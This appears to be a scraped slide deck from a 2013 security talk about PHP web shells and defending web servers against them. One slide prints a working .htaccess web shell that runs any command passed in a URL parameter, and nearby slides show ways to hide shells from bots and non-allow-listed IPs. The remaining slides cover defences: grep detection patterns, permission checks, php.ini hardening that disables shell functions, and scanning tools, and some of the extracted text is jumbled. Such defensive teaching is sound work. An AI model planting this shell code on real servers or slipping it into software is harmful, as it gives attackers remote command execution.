  • 24. # <!-- Self contained .htaccess web shell - Part of the htshell project # Written by Wireghoul - http://www.justanotherhacker.com # Override default deny rule to make .htaccess file accessible over web <FilesEmbed it in other scripts code that is already on  ~ "^.ht"> Order allow,deny site Allow from all  Put </Files> in an .htaccess file the See Eldar “Wireghoul” Marcussen’s work: # Make .htaccess file be interpreted as php file. This occur after apache has https://github.com/wireghoul/htshells interpreted # the apache directoves from the .htaccess file AddType application/x-httpd-php .htaccess ###### SHELL ###### <?php echo "--><form method='get'><input type='text' name='c' value='".$_GET['c']."'><input type='submit' name='go' value='Go!'></form>n<pre>";passthru($_GET['c']." 2>&1");echo "</pre>"; ?> http://Irongeek.com
  • 25.  Attackers don’t want others finding their shells and using them <?php if(preg_match("/bot/", $_SERVER[HTTP_USER_AGENT])) {header("HTTP/1.0 404"); exit("<h1>Not Found</h1>");}… http://Irongeek.com
  • 26. //Example from Laudanum $allowedIPs = array("192.168.1.55", "12.2.2.2"); $allowed = 0; foreach ($allowedIPs as $IP) { if ($_SERVER["REMOTE_ADDR"] == $IP) $allowed = 1; } if ($allowed == 0) { header("HTTP/1.0 404 Not Found"); die(); } http://Irongeek.com
  • 27.  How well do the think that will work for them? <?php // This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited. … http://Irongeek.com
  • 29.   Ugly, but works: grep -i "=http://" access.log | grep -i ".txt|.inc.|.dat" May like my script better http://Irongeek.com
  • 30.    Look for “bad” functions grep -RPnl "(gzinflate|eval|base64_decode)" /var/www/ No perfect list Many false positives http://Irongeek.com
  • 31.    AV will mostly miss them PHP-Shell-Detector Just signature based to my knowledge Scans: php/perl/asp/aspx https://github.com/emposha/PHP-Shell-Detector NeoPI Detects on Signatures, Entropy, Longest Word and Index of Coincidence Scans: php/asp/aspx/sh/bash/zsh/csh/tsch/pl/py/cgi/cfm https://github.com/Neohapsis/NeoPI http://Irongeek.com
  • 35.       Defaults may be ok, but stuff happens Test installs like XAMPP may be ran as the user Moving files from one place to another can have unintended consequences Shared hosting may have your site running under your account, giving scripts permission to your files Check for writable files? find /var/www/ -user www-data -perm -u=w –ls find /var/www/ -perm -2 -ls Use with caution, just for world writeables: find /var/www -type d -exec chmod 2775 {} + find /var/www -type f -exec chmod 0664 {} + http://Irongeek.com
  • 36. Much of the following text copied from /etc/php5/apache2/php.ini http://Irongeek.com
  • 37.     Allow ASP-style <% %> tags. asp_tags = Off http://php.net/asp-tags PHP Banner in web server header expose_php = On http://php.net/expose-php Whether to allow HTTP file uploads. file_uploads = On http://php.net/file-uploads Display Errors display_errors = On http://php.net/display-errors http://Irongeek.com
  • 38.    Whether to allow the treatment of URLs (like http:// or ftp://) as files. allow_url_fopen = On http://php.net/allow-url-fopen Whether to allow include/require to open URLs (like http:// or ftp://) as files. (Off by default in now.) allow_url_include = Off http://php.net/allow-url-include Disable easily abused functions disable_functions=system,exec,passthru,shell_exec http://php.net/manual/en/ini.core.php#ini.disablefunctions http://Irongeek.com
  • 39.      “DEPRECATED as of PHP 5.3.0 and REMOVED as of PHP 5.4.0” Many functions modified so UID of the script and the files/directories operated on are the same. Some functions like shell_exec() disabled Others like exec() system() require the executable to be in safe_mode_exec_dir Way more details here: http://www.php.net/manual/en/features.safemode.functions.php http://Irongeek.com
  • 40.      Host based WAF Available at: http://www.modsecurity.org modsecurity_crs_45_trojans.conf Changed my config to: SecRuleEngine On SecDefaultAction "phase:4,deny,log,status:500“ Signature based, so same rule applies as AV http://Irongeek.com
  • 41.    Turn off Directory indexing Add this to .htaccess file or Directory configs: Options -Indexes An example of why: http://www.google.com/?q=intitle:index.of+c99.txt http://Irongeek.com
  • 42.   Shared Hosting MD5 Change Detection Script http://www.irongeek.com/i.php?page=security/sha red-hosting-md5-change-detection-script Script To Grep For RFI, Webshells, Password Grabs, Web Scanners, Etc. http://www.irongeek.com/i.php?page=security/log watch-script-grep-for-rfis-webscanners-webshellattacks http://Irongeek.com
  • 43.       Writing a stealth web shell and .htaccess shells by Eldar “Wireghoul” Marcussen http://www.justanotherhacker.com/2011/12/writing-a-stealth-web-shell.html http://www.justanotherhacker.com/projects/htshells/ Effectiveness of Antivirus in Detecting Web Application Backdoors by Rahul “FB1H2S” Sasi http://www.exploit-db.com/wp-content/themes/exploit/docs/16082.pdf Detecting Obfuscated Web Shells Talk by Scott Behrens http://www.youtube.com/watch?v=gRSKuAS71pI Web Shell Detection Using NeoPI by Scott Behrens and Ben Hagen http://resources.infosecinstitute.com/web-shell-detection/ Threat: DDoS Booter Shell Scripts http://www.prolexic.com/pdf/Prolexic_Threat_Advisory_DDoS_Booter_Scripts_ 052612.pdf Booting the Booters, Stressing the Stressors - Allison Nixon and Brandon Leven http://www.irongeek.com/i.php?page=videos/bsidesri2013/2-0-booting-thebooters-stressing-the-stressors-allison-nixon-and-brandon-levene http://Irongeek.com
  • 44. Derbycon Sept 25th-29th, 2013 Derbycon Art Credits to DigiP Photo Credits to KC (devauto) http://www.derbycon.com Others http://www.louisvilleinfosec.com http://skydogcon.com http://hack3rcon.org http://Irongeek.com http://outerz0ne.org http://phreaknic.info http://notacon.org

Hinweis der Redaktion

  1. Take a note from Johnny Long’s book, and Bruce Potter’s book.
  2. Beg for hardwaredonations. 